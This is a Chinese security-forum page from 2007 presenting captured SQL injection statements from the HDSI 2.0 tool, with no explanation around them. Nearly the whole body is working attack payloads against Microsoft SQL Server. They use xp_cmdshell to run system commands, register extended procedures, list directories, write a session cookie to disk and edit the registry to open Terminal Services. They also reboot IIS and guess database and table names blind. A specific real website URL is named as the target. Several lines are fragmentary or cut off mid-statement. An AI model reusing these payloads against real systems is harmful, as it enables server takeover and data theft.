| | 网站首页 | 资料中心 | 安盟论坛 | | |
![]() |
![]() |
| 您现在的位置: 安全联盟 >> 资料中心 >> 溢出程序 >> 文章正文 |
|
|||||
| hdsi2.0 sql注入部分抓包分析语句 | |||||
作者:admin 文章来源:本站原创 点击数: 更新时间:2007-6-10 ![]() |
|||||
|
hdsi2.0 sql注入部分抓包分析语句
;insert tb1 exec master..xp_cmdshell'net user '-- ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
sql: ;ipconfig -all-- dos: ;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell -all"--
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu MASTER..XP_dirtree "c:",1,1-- GET /plaza/event/new/crnt_event_view.asp?event_id=57 And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0 上传文件: 本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c: 数据库存储过程: ;exec master..xp_cmdshell ' echo cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;% 0cdb_oldtopics=D8D>c:\'--
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])-- ;insert into xiaopan(cmd) values(' echoStr ')-- ;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH ;Drop table [xiaopan]--
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';- ;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';---- ;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;---- ;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control servert','senabled','reg_dword',1;---- ;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
layout\toggle','hotkey','reg_sz','1';---- ;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----
使用关键字 宝石公园“你玩 我抽”中奖名单公布 http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57 多句查询 支持 ;create table t_jiaozhu(jiaozhu varchar(200)) And 1=1 and (select len(db_name()))<16 and (select ascii(substring(db_name(),1,1)))<80
猜解数据库: GET and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8 and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by desc) <104 desc) <104
EventCategory GET order by id desc) < 80 and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char order by id desc) < 80 and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char order by id desc) < 80
order by id desc) < 80
GET and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32 B.name='EventCategory' order by A.name desc) T order by name asc )<35 |
|||||
| 文章录入:admin 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 友情链接 | ||||||||||||||
| | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | | |
![]() |
Copyright © 2006-2007 安全联盟, All Rights Reserved 站长:天 |